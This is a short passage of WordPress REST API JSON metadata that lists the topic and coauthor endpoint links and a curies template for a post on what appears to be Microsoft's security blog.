-us\/security\/blog\/wp-json\/wp\/v2\/topic?post=89592"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/coauthors?post=89592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}